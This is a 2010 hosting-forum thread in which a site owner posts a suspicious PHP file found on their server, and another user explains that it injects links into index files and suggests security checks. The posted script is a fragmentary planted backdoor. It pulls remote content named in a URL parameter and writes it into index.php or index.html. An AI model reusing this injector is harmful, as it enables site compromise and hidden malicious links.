Portal Home > Knowledgebase > Articles Database > Suspicious php
Suspicious php
| Posted by wildbrook, 03-24-2010, 06:18 AM |
I found the following script on my server (in my cgi folder), in a file called "xrdam.php". Now, I'm fairly sure I didn't put it there, although I have been installing a few bits and pieces recently, so I can't be sure.
Because I'm not familiar with php syntax, I have no way of knowing what it does. Can someone help me with this?
I have found odd files like this before, and am wondering if someone is hacking.
",$read)){
$fp = fopen($t."index".$r,"w");
if(fwrite($fp,$read."\n")) print "Setuped...";
fclose($fp);
} else print "Already....";
}
if($_GET['f']){
$f = file_get_contents($_GET['f']);
$read = html_entity_decode(implode('',file($t."index".$r)));
if(ereg("",$read)){
$ex = explode("",$read);
if($r == ".php"&&ereg("Joomla",$ex[0])&&!ereg("?>",$ex[0])){
$op = "?>\n";
}else{
$op = '';
}
$fw = $ex[0].$op."".$f;
$fp = fopen($t."index".$r,"w");
if(fwrite($fp,$fw)) print "{OK!}";
fclose($fp);
}
}
?>
|
| Posted by Crashus, 03-24-2010, 06:41 AM |
| It is adding hidden links (maybe even to malware) into your index files (html and php)
|
| Posted by wildbrook, 03-24-2010, 07:37 AM |
| Thank you!
Does it say anything about the type/destination/source of the links?
Will I be able to see them in the programming?
|
| Posted by Crashus, 03-24-2010, 07:58 AM |
| Most likely you will see them in a source code of html page itself, or you will be redirected to them when you will load the page, unfortunately I can not give you exact answer on this
|
| Posted by wildbrook, 03-24-2010, 08:15 AM |
| Thank you very much!
I have no idea how they're getting in, though. FTP access is locked to my IP...
|
| Posted by Crashus, 03-24-2010, 08:33 AM |
| Scan your PC for viruses, is this shared hosting or dedicated server?
|
| Posted by wildbrook, 03-24-2010, 11:01 AM |
| I'm on Mac, and (as far as I can be sure) have no viruses.
The server is remote, and is part of a reseller's account (mine). I assume it's a shared server - I've not paid for anything but the basic reseller's package. That being said, there is no access to other sites through ftp like I've seen on some other virtual servers.
|
| Posted by Crashus, 03-24-2010, 11:30 AM |
| Mac has no viruses which can act in that way. Do you have secure permissions for your hosted files and folders? If you're absolutely sure about your security than it may be your hosters one
|
| Posted by wildbrook, 03-24-2010, 12:54 PM |
| The permissions are set to 755 for that certain folder (it's a cgi folder).
I'm as sure as I can be about security but in truth I have little knowledge of what these people can do, and/pr how to stop them. I'm content that no one's getting in through my computer (i.e. stealing passwords), I have a strong password, and, as I said in an earlier reply, my ftp access is locked to my IP address, so I'm stumped.
|
| Posted by Crashus, 03-24-2010, 12:56 PM |
| Then most-likely your security is okay, ask your support to provide some logs like who and when was using your ftp access and was changing\uploading this file.
|
| Posted by wildbrook, 03-24-2010, 04:52 PM |
| Thanks, Crashus: I found a link in an auto-redirecting index file - not one that is ever updated or overwritten, so I'm really grateful to you for knowing to look, and where to look, for the coding.
I've written to my service provider, to mention to issue and ask about logs. I'm waiting to hear what they say.
Thanks again.
|
| Posted by Crashus, 03-24-2010, 04:57 PM |
| You're welcome, feel free to PM me in case of any questions
|
Add to Favourites 
Print this Article
Also Read
